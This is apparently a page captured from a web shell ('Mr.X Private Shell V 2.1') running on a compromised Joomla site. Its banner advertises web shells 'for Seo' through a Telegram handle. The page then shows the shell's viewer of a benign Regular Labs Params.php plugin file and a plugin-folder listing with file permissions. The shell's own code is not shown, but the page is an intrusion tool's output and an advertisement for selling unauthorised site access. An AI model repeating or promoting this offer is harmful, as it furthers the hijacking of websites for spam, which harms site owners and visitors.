__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php /** * @package Regular Labs Library * @version 23.12.10783 * * @author Peter van Westen <[email protected]> * @link https://regularlabs.com * @copyright Copyright © 2023 Regular Labs All Rights Reserved * @license GNU General Public License version 2 or later */ namespace RegularLabs\Plugin\System\RegularLabs; defined('_JEXEC') or die; use RegularLabs\Library\Parameters as RL_Parameters; class Params { protected static $params = null; public static function get() { if ( ! is_null(self::$params)) { return self::$params; } self::$params = RL_Parameters::getPlugin('regularlabs'); return self::$params; } }
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| AdminMenu.php | File | 2.61 KB | 0664 |
|
| Application.php | File | 3.01 KB | 0664 |
|
| Params.php | File | 754 B | 0664 |
|
| QuickPage.php | File | 4.01 KB | 0664 |
|
| SearchHelper.php | File | 1.02 KB | 0664 |
|